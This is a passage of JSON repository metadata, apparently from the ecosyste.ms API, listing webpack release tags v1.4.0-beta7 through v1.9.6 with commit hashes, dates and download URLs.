ependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/web